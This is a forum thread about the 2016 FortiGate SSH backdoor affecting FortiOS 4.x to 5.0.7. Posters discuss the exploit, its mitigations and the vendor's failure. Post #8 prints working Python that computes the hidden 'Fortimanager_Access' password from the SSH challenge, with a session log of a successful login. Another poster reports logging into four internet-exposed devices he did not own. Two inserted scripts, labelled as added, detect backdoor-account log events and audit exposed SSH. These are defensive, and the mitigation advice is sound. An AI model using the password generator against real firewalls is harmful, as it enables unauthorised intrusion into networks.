SSH Backdoor for FortiGate OS Version 4.x up to 5.0.7

Page: 12 > Showing page 1 of 2
Author
MikeU
New Member
  • Total Posts : 14
  • Scores: 0
  • Reward points: 0
  • Joined: 2007/09/26 10:59:14
  • Status: offline
2016/01/12 10:22:38 (permalink)
0

SSH Backdoor for FortiGate OS Version 4.x up to 5.0.7

http://seclists.org/fulldisclosure/2016/Jan/26
 
I have not had a chance to try this. I don't see any threads discussing it. So, I thought I'd share.
 

=Mike

#1
deepakmime
New Member
  • Total Posts : 1
  • Scores: 0
  • Reward points: 0
  • Joined: 2015/12/08 10:44:29
  • Status: offline
Re: SSH Backdoor for FortiGate OS Version 4.x up to 5.0.7 2016/01/12 11:55:58 (permalink)
0
Are there any comments from the Fortinet technical team on it? Very keen to know.
 
The guy here on Twitter confirms that he has the backdoor working:
 
https://twitter.com/esizkur
 
 
 
#2
djwilliams
New Member
  • Total Posts : 14
  • Scores: 0
  • Reward points: 0
  • Joined: 2014/01/16 07:40:44
  • Status: offline
Re: SSH Backdoor for FortiGate OS Version 4.x up to 5.0.7 2016/01/12 12:38:48 (permalink)
0
I have tried the script out there and have not been able to get it to work. Until we get some answer from Fortinet I'm going to keep at it.
#3
Stan
New Member
  • Total Posts : 1
  • Scores: 0
  • Reward points: 0
  • Joined: 2014/12/22 05:43:08
  • Status: offline
Re: SSH Backdoor for FortiGate OS Version 4.x up to 5.0.7 2016/01/12 13:05:19 (permalink)
0
Tried it on a 5.0.7 version and it works.
The script logs in without any password prompt.
#4
kaj73
New Member
  • Total Posts : 17
  • Scores: 0
  • Reward points: 0
  • Joined: 2004/12/29 03:10:25
  • Status: offline
neonbit
Expert Member
  • Total Posts : 559
  • Scores: 72
  • Reward points: 0
  • Joined: 2013/07/02 21:39:52
  • Location: Dark side of the moon
  • Status: offline
Re: SSH Backdoor for FortiGate OS Version 4.x up to 5.0.7 2016/01/12 16:52:43 (permalink)
0
Confirming the script works. I just tested on a fresh FGVM running 5.0.6 and it logs in automatically...
 
~/Desktop $ ./fgt_ssh_backdoor.py 192.168.100.200
FortiGate-VM64 # get sys status
Version: FortiGate-VM64 v5.0,build0271,140124 (GA Patch 6)
Virus-DB: 16.00560(2012-10-19 08:31)
Extended DB: 1.00000(2012-10-17 15:46)
IPS-DB: 4.00345(2013-05-23 00:39)
IPS-ETDB: 0.00000(2001-01-01 00:00)
Serial-Number: FGVMEV0000000000
#6
neonbit
Expert Member
  • Total Posts : 559
  • Scores: 72
  • Reward points: 0
  • Joined: 2013/07/02 21:39:52
  • Location: Dark side of the moon
  • Status: offline
Re: SSH Backdoor for FortiGate OS Version 4.x up to 5.0.7 2016/01/12 20:02:29 (permalink)
0
I just did a quick search for FortiGates online running SSH and after 10 minutes was able to connect to 4... this is going to hurt some people methinks...
 
I noticed that there is no log saved for the actual SSH connection from the script. The only time I was able to see a log entry was when I changed the config (user: Fortimanager_Access).

#7
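neonbit's observation above, that the backdoor login itself leaves no log and only a later config change shows up under user Fortimanager_Access, is the hook for detection. The script below is an added example written for this page, not code from the thread or from Fortinet: it parses FortiGate key=value event logs and flags activity attributed to the reserved account from any address other than your real FortiManager. The sample log lines, their log IDs and the 10.0.0.9 FortiManager address are constructed for the example.

```python
import re

# Constructed sample FortiGate event-log lines in the key=value syslog layout.
# They are assumptions about the format and log IDs, not lines from the thread:
# 1) an ordinary admin login, 2) a config edit made inside a backdoor session
#    from an unknown address (the only trace the thread reports seeing),
# 3) the same reserved account used from the site's real FortiManager (10.0.0.9).
SAMPLE_LOGS = [
    'date=2016-01-13 time=01:20:04 devname=FGVM logid=0100032001 type=event subtype=system '
    'level=information vd="root" logdesc="Admin login successful" user="admin" '
    'ui=ssh(10.0.0.5) method=ssh srcip=10.0.0.5 dstip=192.168.100.200 action=login status=success',
    'date=2016-01-13 time=01:31:17 devname=FGVM logid=0100044547 type=event subtype=system '
    'level=information vd="root" logdesc="Object attribute configured" user="Fortimanager_Access" '
    'ui=ssh(198.51.100.23) action=Edit cfgpath="system.admin" cfgobj="admin" '
    'cfgattr="ssh-public-key1[->ssh-rsa AAAA...]" msg="Edit system.admin admin"',
    'date=2016-01-13 time=02:05:41 devname=FGVM logid=0100044547 type=event subtype=system '
    'level=information vd="root" logdesc="Object attribute configured" user="Fortimanager_Access" '
    'ui=ssh(10.0.0.9) action=Edit cfgpath="firewall.policy" cfgobj="12" msg="Edit firewall.policy 12"',
]

# key=value pairs; a value is either a double-quoted string or a run of non-space characters
KV_RE = re.compile(r'(\w+)=("(?:[^"\\]|\\.)*"|\S+)')
UI_RE = re.compile(r'^(\w+)\((.+)\)$')   # e.g. ssh(198.51.100.23) -> channel, source address


def parse_fortilog(line):
    """Split one FortiGate log line into a dict, stripping the quotes around quoted values."""
    fields = {}
    for key, value in KV_RE.findall(line):
        if len(value) >= 2 and value[0] == value[-1] == '"':
            value = value[1:-1]
        fields[key] = value
    return fields


def reserved_account_events(lines, account='Fortimanager_Access'):
    """Every event attributed to the reserved account, with the channel and source it came from."""
    hits = []
    for line in lines:
        f = parse_fortilog(line)
        if f.get('user') != account:
            continue
        m = UI_RE.match(f.get('ui', ''))
        hits.append({
            'time': f.get('date', '?') + ' ' + f.get('time', '?'),
            'device': f.get('devname', '?'),
            'channel': m.group(1) if m else f.get('ui', '?'),
            'source': m.group(2) if m else f.get('srcip', '?'),
            'what': f.get('msg') or f.get('logdesc', '?'),
        })
    return hits


def suspicious_events(lines, known_fortimanager_ips):
    """Reserved-account activity from anywhere other than the FortiManager(s) you actually run."""
    return [h for h in reserved_account_events(lines) if h['source'] not in known_fortimanager_ips]


if __name__ == '__main__':
    for h in suspicious_events(SAMPLE_LOGS, {'10.0.0.9'}):
        print(f"{h['time']} {h['device']}: {h['what']} via {h['channel']} from {h['source']}")
```

Because the thread reports no log entry for the session itself, a clean run over config-change events is not proof the box was never touched; pair this with an SSH exposure check and with whatever your upstream firewall or flow logs record for TCP/22 to the management addresses.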
localhost
Gold Member
  • Total Posts : 135
  • Scores: 25
  • Reward points: 0
  • Joined: 2015/05/21 02:47:51
  • Location: Zug, Switzerland
  • Status: offline
Re: SSH Backdoor for FortiGate OS Version 4.x up to 5.0.7 2016/01/13 01:26:21 (permalink)
0
Thanks for sharing Mike.
 
I've got mixed results. This one works:
Version: FortiGate-VM64 v5.0,build0128,121101 (GA)
 
But I was unable to access my FG-111C:
Fortigate-111C v4.0,build0639,120906 (MR3 Patch 10)
 
Don't know... maybe it's because I did a downgrade from 5.2. Or they have different salts.
 
For those who don't want to dig too deep into this.
 
This is all the magic:
 
If you connect via SSH with the user 'Fortimanager_Access', you'll receive a challenge.
Then you can calculate the dynamic password based on this dword challenge:
 
import base64, hashlib

def dynamic_password(challenge):  # challenge = the keyboard-interactive prompt text, e.g. "-1378285763"
    m = hashlib.sha1()
    m.update(b'\x00' * 12)
    m.update(challenge.encode() + b'FGTAbc11*xy+Qqz27')
    m.update(b'\xA3\x88\xBA\x2E\x42\x4C\xB0\x4A\x53\x79\x30\xC1\x31\x07\xCC\x3F\xA1\x32\x90\x29\xA9\x81\x5B\x70')
    return 'AK1' + base64.b64encode(b'\x00' * 12 + m.digest()).decode()  # send this as the password
 

 
Putty:
login as: Fortimanager_Access
 
Using keyboard-interactive authentication. -840056459
 
Access denied
 
Using keyboard-interactive authentication. -1914958026
 
Access denied
 
Using keyboard-interactive authentication. -1378285763
 
AK1AAAAAAAAAAAAAAAAmWT0TKGMI23Iq4Q9P42z0PwpYBQ=
 
FortiGate-VM64 #
 

 
This only works if you have SSH access. So by limiting the IP ranges for all admin users, you can mitigate the threat.
post edited by localhost - 2016/01/13 02:39:06
#8
emnoc
Expert Member
  • Total Posts : 5800
  • Scores: 383
  • Reward points: 0
  • Joined: 2008/03/20 13:30:33
  • Location: AUSTIN TX AREA
  • Status: offline
Re: SSH Backdoor for FortiGate OS Version 4.x up to 5.0.7 2016/01/13 01:33:15 (permalink)
0
If you enable an SSH key it seems like it results in a fix. Can anybody confirm this on their FGT? (Upload an SSH key from the CLI and retest.)
 

PCNSE 
NSE 
StrongSwan  
#9
localhost
Gold Member
  • Total Posts : 135
  • Scores: 25
  • Reward points: 0
  • Joined: 2015/05/21 02:47:51
  • Location: Zug, Switzerland
  • Status: offline
Re: SSH Backdoor for FortiGate OS Version 4.x up to 5.0.7 2016/01/13 02:07:00 (permalink)
0
Like this?
 
login as: admin
Authenticating with public key "rsa-key-20160113"
FortiGate-VM64 # conf sys admin
FortiGate-VM64 (admin) # show
config system admin
  edit "admin"
     set accprofile "super_admin"
     set vdom "root"
     set ssh-public-key1 "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArnvrfeRc/Dp29mYq6Yp4YqHSYzvdsGiwvt5I+5PiQKACosqED4L6OApvXBtEsJz7XMJct9cADHxgajn2UrxDUxgjec3/4NVYkq9/jHm1X0y5MbgLb5X2ftDQNqM3gzO2vk6ZRCN9kyq4oCs0V2ynZYnjp8Q8/pRYAm/Y4DhE8s+SZKhDHNq6R3q4wc9IPWgAiWSGCsaPPGH2+3cYlvwQRDyva5RsWZPz4WhLm33A+/rl+4CBXY70mlPuXN3xvps9IGTb0yYA0H03tfGbKxaQdEArFe4nh30b8gTZALtWJ3lNE1Y8oq3zVYrnfDIzmtNsCY/NnaSKi9bQMH0TcRjEUQ== rsa-key-20160113"
     config dashboard-tabs
        <snip>
     end
     config dashboard
        <snip>
     end
     set password ENC AK1nds6rsH4pi3VuVI9jjtvaXR1fZjp5v8Stds1F03wrqA=
  next
end
FortiGate-VM64 (admin) #

 
Still able to access with the FortiManager user.
#10
emnoc
Expert Member
  • Total Posts : 5800
  • Scores: 383
  • Reward points: 0
  • Joined: 2008/03/20 13:30:33
  • Location: AUSTIN TX AREA
  • Status: offline
Re: SSH Backdoor for FortiGate OS Version 4.x up to 5.0.7 2016/01/13 02:27:40 (permalink)
0
No, set a generic public key for a user 'Fortimanager_Access' and see what happens.

PCNSE 
NSE 
StrongSwan  
#11
localhost
Gold Member
  • Total Posts : 135
  • Scores: 25
  • Reward points: 0
  • Joined: 2015/05/21 02:47:51
  • Location: Zug, Switzerland
  • Status: offline
Re: SSH Backdoor for FortiGate OS Version 4.x up to 5.0.7 2016/01/13 02:33:28 (permalink)
0
You can't edit Fortimanager_Access.
 
FortiGate-VM64 (admin) # edit Fortimanager_Access
table name 'Fortimanager_Access' can't be added or edited because of duplication or reservation
Command fail. Return code -515

#12
emnoc
Expert Member
  • Total Posts : 5800
  • Scores: 383
  • Reward points: 0
  • Joined: 2008/03/20 13:30:33
  • Location: AUSTIN TX AREA
  • Status: offline
Re: SSH Backdoor for FortiGate OS Version 4.x up to 5.0.7 2016/01/13 02:44:12 (permalink)
0
I see, thanks for validating. It looks like you can edit the acct in 5.2.x, which I realize is not impacted.
 
e.g
 
config system admin
    edit "Fortimanager_Access"
        set accprofile "prof_admin"
        set vdom "root"
        set password ENC AK1wkED9vYrMpQdDCa3VH7ciPxpid81Y0m8lUB4/qIzc+I=
    next
end


What OS version are you running on that VM?
 

PCNSE 
NSE 
StrongSwan  
#13
localhost
Gold Member
  • Total Posts : 135
  • Scores: 25
  • Reward points: 0
  • Joined: 2015/05/21 02:47:51
  • Location: Zug, Switzerland
  • Status: offline
Re: SSH Backdoor for FortiGate OS Version 4.x up to 5.0.7 2016/01/13 02:55:10 (permalink)
0
I'm running: FortiGate-VM64 v5.0,build0128,121101 (GA)
 
I wonder what they've changed. I hope it's not just the salt or the method by which they calculate the password.
Otherwise it's just a matter of time until someone reverses the new method.
 
If you manually add the Fortimanager_Access user, do you still receive the challenges? And if you don't receive the challenges.. would the box still be manageable by the fortimanager?
#14
emnoc
Expert Member
  • Total Posts : 5800
  • Scores: 383
  • Reward points: 0
  • Joined: 2008/03/20 13:30:33
  • Location: AUSTIN TX AREA
  • Status: offline
Re: SSH Backdoor for FortiGate OS Version 4.x up to 5.0.7 2016/01/13 03:04:17 (permalink)
0
Yes and I can't answer the latter, no fortimanager here. Okay back to sleep for me it's 05:03AM ;)
 
 

PCNSE 
NSE 
StrongSwan  
#15
tab
New Member
  • Total Posts : 2
  • Scores: 0
  • Reward points: 0
  • Joined: 2016/01/21 12:44:29
  • Status: offline
Re: SSH Backdoor for FortiGate OS Version 4.x up to 5.0.7 2016/01/21 13:18:16 (permalink)
0
Hi Folks,
 
Is disabling SSH admin access a viable (temporary) fix as suggested here?
 
We have 2 FWs that are on a vulnerable version and they will be replaced in 2 weeks. I'd just rather not go through the trouble of notifying customers and an extra downtime window if they're going to be decommissioned shortly.
 
TIA :)
#16
localhost
Gold Member
  • Total Posts : 135
  • Scores: 25
  • Reward points: 0
  • Joined: 2015/05/21 02:47:51
  • Location: Zug, Switzerland
  • Status: offline
Re: SSH Backdoor for FortiGate OS Version 4.x up to 5.0.7 2016/01/22 01:14:02 (permalink)
0
tab: Is disabling SSH admin access a viable (temporary) fix as suggested here?

Yes sir. Easiest and fastest workaround.
#17
emnoc
Expert Member
  • Total Posts : 5800
  • Scores: 383
  • Reward points: 0
  • Joined: 2008/03/20 13:30:33
  • Location: AUSTIN TX AREA
  • Status: offline
Re: SSH Backdoor for FortiGate OS Version 4.x up to 5.0.7 2016/01/22 04:46:40 (permalink)
0
And if you must open SSH to the public (untrust), then use SSL access with the ssl.root interface enabled for SSH. This will require the SSL VPN client, access (local user or remote) and then the sys admin login. So you have to jump through 2 hoops to gain access.
 
http://socpuppet.blogspot.com/2015/03/sslvpn-sslroot-management-access.html
 
Ken

PCNSE 
NSE 
StrongSwan  
#18
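Two workarounds come up in this thread: localhost's (post #8) of limiting the source IP ranges of admin users, and emnoc's here of taking SSH off the untrusted interface (or hiding it behind ssl.root). The script below is an added example for this page, not code from the thread or from Fortinet. It reads the "Version:" line of "get sys status" and a config backup and reports three things: whether the firmware is in the affected range stated in the thread title (4.x, and 5.0 up to patch 7; emnoc notes 5.2.x is not impacted), admin accounts with no trusthost entry (the assumption here is that FortiOS omits the default open trusthost from the backup, so absence means unrestricted), and interfaces whose allowaccess still lists ssh. The sample status line and config are constructed. Whether trusthost on ordinary admins also gates the reserved account is not tested anywhere in the thread, so treat the ssh exposure findings as the decisive ones.

```python
import re

# Constructed sample input: the "Version:" line of "get sys status" and a trimmed
# FortiOS 5.0 config backup. Both are assumptions about the layout, not material
# from the thread. "admin" has no trusthost; "noc" is locked to two ranges;
# both interfaces still list ssh in allowaccess.
SAMPLE_STATUS = "Version: FortiGate-VM64 v5.0,build0271,140124 (GA Patch 6)"

SAMPLE_CONFIG = """\
config system admin
    edit "admin"
        set accprofile "super_admin"
        set vdom "root"
        config dashboard
            edit 1
                set name "sysinfo"
            next
        end
        set password ENC AK1placeholder
    next
    edit "noc"
        set accprofile "super_admin"
        set vdom "root"
        set trusthost1 10.0.0.0 255.255.255.0
        set trusthost2 10.1.1.7 255.255.255.255
        set password ENC AK1placeholder
    next
end
config system interface
    edit "port1"
        set vdom "root"
        set ip 192.0.2.1 255.255.255.0
        set allowaccess ping https ssh
    next
    edit "port2"
        set vdom "root"
        set ip 10.0.0.1 255.255.255.0
        set allowaccess ping https ssh snmp
    next
end
"""

# "v5.0,build0271,140124 (GA Patch 6)" -> major, minor, patch (no patch number on a plain GA/MRx build)
VERSION_RE = re.compile(r'\bv(\d+)\.(\d+),build\d+,\d+ \((?:GA|MR\d+)(?: Patch (\d+))?\)')


def is_affected(status_line):
    """Version range from the thread title: every 4.x release, and 5.0 up to patch 7."""
    m = VERSION_RE.search(status_line)
    if not m:
        raise ValueError("unrecognised version line: " + status_line)
    major, minor, patch = int(m.group(1)), int(m.group(2)), int(m.group(3) or 0)
    return major == 4 or ((major, minor) == (5, 0) and patch <= 7)


def parse_config(text):
    """{section: {entry: {key: [values]}}} for top-level config/edit/set blocks; nested blocks are skipped."""
    sections, depth = {}, 0
    section = entry = None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith('config '):
            depth += 1
            if depth == 1:
                section = sections.setdefault(line[len('config '):], {})
        elif line == 'end':
            depth -= 1
        elif depth != 1:
            continue                      # inside a nested block such as "config dashboard"
        elif line.startswith('edit '):
            entry = section.setdefault(line[len('edit '):].strip('"'), {})
        elif line.startswith('set ') and entry is not None:
            key, _, rest = line[len('set '):].partition(' ')
            entry[key] = [v.strip('"') for v in rest.split()]
        elif line == 'next':
            entry = None
    return sections


def audit(status_line, config_text):
    """Findings a reviewer would raise against this box for the SSH backdoor."""
    findings = []
    if is_affected(status_line):
        findings.append("firmware in the affected range: " + status_line.partition(':')[2].strip())
    cfg = parse_config(config_text)
    for name, attrs in cfg.get('system admin', {}).items():
        if not any(k.startswith('trusthost') for k in attrs):
            findings.append("admin '%s' has no trusthost restriction" % name)
    for name, attrs in cfg.get('system interface', {}).items():
        access = attrs.get('allowaccess', [])
        if 'ssh' in access:
            findings.append("interface '%s' exposes ssh (allowaccess %s)" % (name, ' '.join(access)))
    return findings


if __name__ == '__main__':
    for f in audit(SAMPLE_STATUS, SAMPLE_CONFIG):
        print('-', f)
```

Run it against a backup taken with "execute backup config" (or the output of "show") and the first line of "get sys status"; every interface reported with ssh in allowaccess is one the backdoor can be reached on, whatever the admin accounts look like.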
tab
New Member
  • Total Posts : 2
  • Scores: 0
  • Reward points: 0
  • Joined: 2016/01/21 12:44:29
  • Status: offline
Re: SSH Backdoor for FortiGate OS Version 4.x up to 5.0.7 2016/01/25 10:15:27 (permalink)
0
Great, thanks localhost and emnoc. I was worried by the initial info that seemed to suggest that it was independent of having SSH enabled.
#19
slavko
Silver Member
  • Total Posts : 83
  • Scores: 6
  • Reward points: 0
  • Joined: 2014/08/09 01:05:35
  • Location: Montenegro
  • Status: offline
Re: SSH Backdoor for FortiGate OS Version 4.x up to 5.0.7 2016/01/25 11:05:14 (permalink)
0
What is fascinating to me, and I must say this even though it is somewhat unprofessional, is how little attention this "issue" is getting here and on the Fuse. On that same note, I do not consider this to be an "issue". It is much worse than that. The fact that a "leading provider of fast and secure cyber security solutions" would let this kind of design/implementation flaw go into production worldwide is almost unbelievable. I hold the entire company responsible for this, and here's why: Product manager(s), for adopting this kind of "solution" to a relatively simple authentication problem. Product developers for implementing this "solution". Internal product security teams for not immediately (or ever, apparently - because if they did, the code wouldn't make it to FAZ 5.2) spotting and banning this obvious high-level security risk. Personally, I would much rather this had been a maliciously planted backdoor than a design/implementation flaw. Because, after this, one has every right to ask: "Do these people even know what they are doing, can I trust them to protect my network?". At least in the Juniper case someone intentionally planted the malicious code, which implies they knew what they were doing. Here, it was unintentional. You cannot imagine how embarrassing the conversations with the customers were these days. Or can you?
post edited by slavko - 2016/01/25 11:11:26

NSE 4, NSE 5, NSE 7, FortiMail & FortiWeb Specialist
All opinions/statements written here are my own.
#20